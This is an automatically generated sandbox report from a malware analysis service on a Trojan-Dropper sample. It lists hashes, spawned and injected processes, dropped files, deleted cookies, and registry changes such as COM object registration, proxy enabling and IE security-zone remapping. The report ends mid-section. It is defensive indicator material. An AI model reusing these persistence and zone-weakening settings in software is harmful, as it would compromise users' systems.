Trojan-Dropper.Win32.Exetemp.a (Kaspersky), Trojan.Generic.1630494 (B) (Emsisoft), Trojan.Generic.1630494 (AdAware), Trojan.Win32.Sasfis.FD, VirTool.Win32.DelfInject.FD, GenericInjector.YR (Lavasoft MAS)
Behaviour: Trojan-Dropper, Trojan, VirTool
The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.
Summary
MD5: 416fdd6af6fefbc60fa55fd21e249d36
SHA1: 41a67db370b029d8ac6b7fc7e15e95884e8d0dfc
SHA256: 599e0d9dbb34ff79fe37ef23f8ee90947418a1c9e4539d0eb54dd5a1a1b10f08
SSDeep: 24576:nS4hIC6wCINBMChyMfcOswCINBMiPp70JZM9Xuqb:S4hI1wCqvuwCMGoXp
Size: 802816 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: MicrosoftVisualC, MicrosoftVisualCv50v60MFC, MicrosoftVisualC50, Armadillov171, UPolyXv05_v6
Company: Piriform Ltd
Created at: 2009-03-13 07:28:29
Analyzed on: WindowsXP SP3 32-bit
Summary: Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).
Dynamic Analysis
Payload
No specific payload has been found.
Process activity
The Trojan creates the following process(es):
EXE_temp1.EXE:308
shock.exe:3516
taskkill.exe:1700
EXE_temp4.EXE:1516
ping.exe:1580
ping.exe:1416
svchots.exe:3760
EXE_temp2.exe:1176
huodongtongzhi.exe:1032
netsh.exe:3916
MiniIE.exe:3436
qtool.exe:3460
EXE_temp0.exe:980
wpzir.exe:3300
%original file name%.exe:1040
The Trojan injects its code into the following process(es):
acsvc.exe:2168
dsau.exe:3672
objs.exe:3332
EXE_temp3.exe:816
Explorer.EXE:1752
File activity
The process EXE_temp1.EXE:308 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\bt3742.bat (48 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\bt3742.bat (0 bytes)
The process shock.exe:3516 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\JMt\sys32\shock_new.dat0 (54 bytes)
%WinDir%\JMt\sys32\shock_new.dat1 (3 bytes)
%WinDir%\JMt\sys32\shock.dll (845 bytes)
The Trojan deletes the following file(s):
%WinDir%\JMt\sys32\shock_new.dat0 (0 bytes)
%WinDir%\JMt\sys32\shock_new.dat1 (0 bytes)
The process EXE_temp4.EXE:1516 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\bt5867.bat (55 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\bt5867.bat (0 bytes)
The process dsau.exe:3672 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Program Files%\Common Files\Lkcjzquw.exe (3511647 bytes)
The process objs.exe:3332 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\yuan[1].css (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\b54815b87c96d562a1e3eb3a6f418[1].gif (1661 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\index[1].html (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\aaf38b09fdfe9c4d8687973dec764[1].gif (570 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\global1.3[2].css (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\yuan[2].css (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\global1.3[1].css (1 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\yuan[1].css (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\index[1].html (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\global1.3[1].css (0 bytes)
The process svchots.exe:3760 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\JMt\win32\DPro.sys (784 bytes)
%WinDir%\JMt\win32\reTcp.sys (196 bytes)
%WinDir%\JMt\win32\config.ini (46 bytes)
%WinDir%\JMt\win32\rename.exe (5480 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Cookies\Current_User@ssl.bing[1].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@money.ca.msn[1].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@abmr[1].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@msnportal.112.2o7[1].txt (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\_desktop.ie6[2].css (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@kaspersky[1].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@www.msn[2].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@aaa[1].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@twitter[1].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@auto.search.msn[1].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@microsoft[1].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@c.msn[1].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@c.bing[1].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@rambler[2].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@atdmt[2].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@kaspersky.122.2o7[2].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@c.ca.msn[1].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@doubleclick[1].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@adnxs[2].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@hm.baidu[1].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@adgear[1].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@c.atdmt[2].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@insurance[2].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@bing[2].txt (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\jquery.min[1].js (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@msn[2].txt (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\_desktop[2].js (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@yandex[1].txt (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\ya[1].htm (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@www.bing[1].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@tns-counter[1].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@scorecardresearch[2].txt (0 bytes)
The process EXE_temp3.exe:816 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Program Files%\Common Files\mdhc\dsau.exe (1702 bytes)
%WinDir%\share\kbdf.dat (122 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\~355ADAFA.ELOG (438554 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\~7AB73D6F.TMP (52 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\~09E7FCEE.TMP (128 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\~2D915D30.TMP (50 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\~4BB0A38B.TMP (98 bytes)
%Documents and Settings%\%current user%\Desktop\Ê·ÉÃÂÂÃâ€â€ÃƒÆ’®Â¾Â¢Â±Â¬Ã“Î÷.lnk (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\~5454C00A.TMP (827 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\~0169CD4B.TMP (141 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\gjmxbvj.ico (388 bytes)
%WinDir%\share\ico.dll (129 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\zeimroy.ico (388 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\~7360087A.TMP (3835 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RarLhr\acsvc.exe (3838 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\ioergor.tmp (132 bytes)
%System%\DqKgbb.dll (141 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\~25C6BFA8.TMP (163 bytes)
%Documents and Settings%\%current user%\Desktop\³ÉÈËÓÎ÷.lnk (1 bytes)
%WinDir%\share\rsvp\objs.exe (52 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\~72A678D6.TMP (146 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Sawrdxeyd.exe (1333 bytes)
The process EXE_temp0.exe:980 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\JMt\wpzir.exe (41 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\iwvsbxk.txt (1281 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\itotzvy.txt (673 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\atxwrlr.txt (55 bytes)
%WinDir%\JMt\sys32\whitelist.txt (3 bytes)
%Documents and Settings%\%current user%\Local Settings\History\History.IE5\desktop.ini (159 bytes)
%WinDir%\JMt\win32\svchots.txt (70868 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\uafuzsr.txt (2105 bytes)
%WinDir%\JMt\sys32\shock.txt (18796 bytes)
%WinDir%\JMt\sys32\whitelist.dat (2 bytes)
%WinDir%\JMt\sys32\qtool.exe (155 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\efjtrit.txt (3 bytes)
%WinDir%\JMt\First.txt (6988 bytes)
%WinDir%\JMt\flist.bin (620 bytes)
%WinDir%\JMt\sys32\shock.exe (111 bytes)
%WinDir%\JMt\sys32\qtool.txt (26868 bytes)
%System%\drivers\HideSys.sys (15 bytes)
%WinDir%\JMt\win32\svchots.exe (1695 bytes)
%WinDir%\JMt\MiniIE.txt (46228 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\sjapgfo.txt (3361 bytes)
%WinDir%\JMt\MiniIE.exe (272 bytes)
The process %original file name%.exe:1040 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\EXE_temp2.exe (20 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\EXE_temp1.EXE (673 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\EXE_temp4.EXE (2105 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\EXE_temp3.exe (673 bytes)
Registry activity
The process EXE_temp1.EXE:308 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "46 B1 8E 83 03 EA B0 A9 40 2D 40 80 F2 38 45 CE"
The process acsvc.exe:2168 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "96 D4 A2 C7 44 4E 3A 95 23 39 19 9A 8C 1F 71 56"
The process shock.exe:3516 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "00 8D 27 10 3A D1 0A 9E 75 2C 67 9B C0 85 4E 12"
[HKCR\Interface\{649FBF2D-FE00-44E6-8A98-B4350960D943}\ProxyStubClsid]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"
[HKCR\CLSID\{0EE16FA9-E135-43B5-8236-A0CC75F60BB6}\TypeLib]
"(Default)" = "{8003D2E5-F50C-4DC2-9670-C44ABCABCE02}"
[HKCR\Urladv.Adv\CLSID]
"(Default)" = "{0EE16FA9-E135-43B5-8236-A0CC75F60BB6}"
[HKCR\TypeLib\{8003D2E5-F50C-4DC2-9670-C44ABCABCE02}\1.0\FLAGS]
"(Default)" = "0"
[HKCR\Urladv.Adv]
"(Default)" = "Adv Class"
[HKCR\Interface\{649FBF2D-FE00-44E6-8A98-B4350960D943}\TypeLib]
"Version" = "1.0"
"(Default)" = "{8003D2E5-F50C-4DC2-9670-C44ABCABCE02}"
[HKCR\Interface\{649FBF2D-FE00-44E6-8A98-B4350960D943}]
"(Default)" = "IAdv"
[HKCR\TypeLib\{8003D2E5-F50C-4DC2-9670-C44ABCABCE02}\1.0]
"(Default)" = "urladv 1.0 Type Library"
[HKCR\Urladv.Adv\CurVer]
"(Default)" = "Urladv.Adv.1"
[HKCR\CLSID\{0EE16FA9-E135-43B5-8236-A0CC75F60BB6}\VersionIndependentProgID]
"(Default)" = "Urladv.Adv"
[HKCR\Urladv.Adv.1]
"(Default)" = "Adv Class"
[HKCR\CLSID\{0EE16FA9-E135-43B5-8236-A0CC75F60BB6}]
"(Default)" = "Adv Class"
[HKCR\CLSID\{0EE16FA9-E135-43B5-8236-A0CC75F60BB6}\InprocServer32]
"ThreadingModel" = "Apartment"
[HKCR\TypeLib\{8003D2E5-F50C-4DC2-9670-C44ABCABCE02}\1.0\0\win32]
"(Default)" = "%WinDir%\JMt\sys32\shock.dll"
[HKCR\CLSID\{0EE16FA9-E135-43B5-8236-A0CC75F60BB6}\InprocServer32]
"(Default)" = "%WinDir%\JMt\sys32\shock.dll"
[HKCR\CLSID\{0EE16FA9-E135-43B5-8236-A0CC75F60BB6}\ProgID]
"(Default)" = "Urladv.Adv.1"
[HKCR\Interface\{649FBF2D-FE00-44E6-8A98-B4350960D943}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"
[HKCR\Urladv.Adv.1\CLSID]
"(Default)" = "{0EE16FA9-E135-43B5-8236-A0CC75F60BB6}"
[HKCR\TypeLib\{8003D2E5-F50C-4DC2-9670-C44ABCABCE02}\1.0\HELPDIR]
"(Default)" = "%WinDir%\JMt\sys32\"
The process taskkill.exe:1700 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "80 F2 29 83 26 3E D9 3A D8 57 28 9C 5D DF 6D 16"
The process EXE_temp4.EXE:1516 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "1E 46 00 20 C6 30 FF 68 8D 7C 6C 4C C4 98 CF 4A"
The process ping.exe:1580 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "1B 56 22 5A 93 95 6F 20 42 74 37 F4 F1 21 18 88"
The process ping.exe:1416 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "31 B7 5D B6 17 80 23 9B 87 71 D4 34 94 5B 39 9E"
The process dsau.exe:3672 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "E5 92 00 A7 B7 49 39 EA 6E 35 EC 86 4B 06 44 38"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
The process objs.exe:3332 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "1"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 02 00 00 00 03 00 00 00 00 00 00 00"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "C3 DD A1 69 1E 03 0A F6 86 B4 8D E7 48 93 86 BA"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Trojan modifies IE settings for security zones to map all web-nodes that bypass the proxy to the Intranet Zone:
"ProxyBypass" = "1"
The Trojan modifies IE settings for security zones to map all URLs to the Intranet Zone:
"IntranetName" = "1"
The Trojan deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
The process svchots.exe:3760 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "1"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKCR\Microsoft.IE]
"(Default)" = "%WinDir%\JMt\win32\rename.exe"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 03 00 00 00 03 00 00 00 00 00 00 00"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "88 4E 79 67 40 E8 4D C6 21 BD 03 61 D7 2D B9 1C"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Trojan modifies IE settings for security zones to map all web-nodes that bypass the proxy to the Intranet Zone:
"ProxyBypass" = "1"
The Trojan modifies IE settings for security zones to map all URLs to the Intranet Zone:
"IntranetName" = "1"
The Trojan deletes the following registry key(s):
[HKLM\SOFTWARE\Microsoft\Internet Explorer\Extensions\{FB5F1910-F110-11d2-BB9E-00C04F795683}]
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{DBC80044-A445-435b-BC74-9C25C1C588A9}]
[HKLM\SOFTWARE\Microsoft\Internet Explorer\Extensions\{e2e2dd38-d088-4134-82b7-f2ba38496583}]
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{E7E6F031-17CE-4C07-BC86-EABFE594F69C}]
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{18DF081C-E8AD-4283-A596-FA578C2EBDC3}]
The Trojan deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
The process EXE_temp2.exe:1176 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "85 4B 50 9D 69 C3 68 4B 87 05 F1 33 7A D0 FE 69"
[HKCR\HTTP\shell\open\command]
"(Default)" = "%Program Files%\Internet Explorer\IEXPLORE.EXE -nohome"
The process huodongtongzhi.exe:1032 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "55 4A 3F 34 3C F2 5F C9 19 43 A8 20 AA EC 77 D1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
The process netsh.exe:3916 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\qagent]
"Active" = "1"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"Guid" = "8aefce96-4618-42ff-a057-3536aa78233e"
[HKLM\SOFTWARE\Microsoft\Tracing\FWCFG]
"MaxFileSize" = "1048576"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\NAP\Netsh]
"ControlFlags" = "1"
[HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000008]
"PackedCatalogItem" = "25 53 79 73 74 65 6D 52 6F 6F 74 25 5C 73 79 73"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\qagent]
"ControlFlags" = "1"
[HKLM\System\CurrentControlSet\Services\Winsock\Setup Migration\Providers\NetBIOS]
"WinSock 1.1 Provider Data" = "0E 10 00 00 11 00 00 00 14 00 00 00 14 00 00 00"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\NAP\Netsh]
"Active" = "1"
[HKLM\System\CurrentControlSet\Services\Winsock\Setup Migration\Providers\Tcpip]
"WinSock 2.0 Provider ID" = "A0 1A 0F E7 8B AB CF 11 8C A3 00 80 5F 48 A1 92"
[HKLM\SOFTWARE\Microsoft\Tracing\FWCFG]
"ConsoleTracingMask" = "4294901760"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\NAP\Netsh\Napmontr]
"BitNames" = " NAP_TRACE_BASE NAP_TRACE_NETSH"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"Active" = "1"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"Active" = "1"
[HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000006]
"PackedCatalogItem" = "25 53 79 73 74 65 6D 52 6F 6F 74 25 5C 73 79 73"
[HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000005]
"PackedCatalogItem" = "25 53 79 73 74 65 6D 52 6F 6F 74 25 5C 73 79 73"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
